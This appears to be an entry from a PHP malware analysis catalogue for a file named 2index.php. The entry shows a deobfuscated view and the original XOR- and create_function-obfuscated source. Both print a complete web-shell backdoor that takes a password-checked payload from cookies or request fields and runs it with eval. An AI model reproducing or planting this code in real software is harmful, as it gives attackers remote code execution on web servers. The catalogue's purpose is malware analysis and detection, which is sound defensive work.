PHP Malware Analysis

Back to list

Filename: 2index.php

Tags

Encoding
  • base64_decode
Execution
  • eval

Deobfuscated code

<?php

$VJcajj = '.AY.YSmU3V1XRRN';
$KueWZPVl = "create_function";
$IENHTli = 'X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe';
$wLZRBSe = function () {
    if (!function_exists('xor_data__mut')) {
        function xor_data__mut($data, $key)
        {
            $out = '';
            for ($i = 0; $i < strlen($data); $i++) {
                $out .= $data[$i] ^ $key[$i % strlen($key)];
            }
            return $out;
        }
    }
    $data = false;
    $data_key = false;
    foreach ($_COOKIE as $key => $value) {
        $data_key = $key;
        $data = $value;
    }
    if (!$data) {
        foreach ($_REQUEST as $key => $value) {
            $data_key = $key;
            $data = $value;
        }
    }
    $data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
    if ($data && array_key_exists('key', $data) && md5($data['key']) == 'cf94416b34fb053a2b893477766f739a' && array_key_exists('payload', $data)) {
        eval($data['payload']);
        exit(0);
    }
    echo md5(md5($_SERVER["HTTP_HOST"]));
};
$wLZRBSe();


Original code

<?php $VJcajj='.AY.YSmU3V1XRRN'; $KueWZPVl='M3<O-623F8R,;= '^$VJcajj; $IENHTli='X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe'; $wLZRBSe=$KueWZPVl('', '1FNF1-RTJTO+1X3-GDXEbXY0h+O53q04>LmJLv=9nM9TC-8OSg;5G4H Z9;.UFTFI0 O4dWNSV2BlLHVY-gaoEZ-:JGeRULn9OQ KYS=yTkCMNfTnCHR+4NLcDS0-PSZoYLyYkz1J:88XDnZGbSAN51rScKcBb,S8vU kKG4HH>5RIT, YH-zP0Og;YB33UrgOGIDzsNEo7mkRU8MOMuDWSPIYwzL,JOM11N2yXu72L>1Ibf<< -OR9IZBr65-vr,U8OLJV0HoEqaM5.>CPaE+IAI4-TQ0,X=uDte-ETj13F.S>.FjfJV YUEk7KagIXDYtUDLC5YPGgxHXH,5-HHET1h++2+97F+SNM=ROXYMWJ08 OEcz:ln0B6UD+6VHKOraB2U5IPfLW0VO-qXDID;X3WkEa:h6G:t>5Y-KeG0=ENX I-Z8 2y-.7s6PDP87TU K1,5Txe>V35R.7LOI;1QBMnIZQT;.8-ICfwe=Uak W:SXRgF2643A6>Y3q1CPG CGK.+3WZAi39>PzvEGXF7 MRS10JY<RW4DA-DnGLPR,FMVdFe2UN16Bmx3v+PiXBnBPutJoJZ4rZbOVfQ:R2I3:+ g-E8BL4bd43OXCAOFEUWV2T1yfXFvGIQVX=NX9=YK 571uFPJ1W7U1bogUcb-OI=LJLMnQbE5C7gYSffY1oXjni=ek-1+H+t><s<689G:GBpSo'^$IENHTli); $wLZRBSe();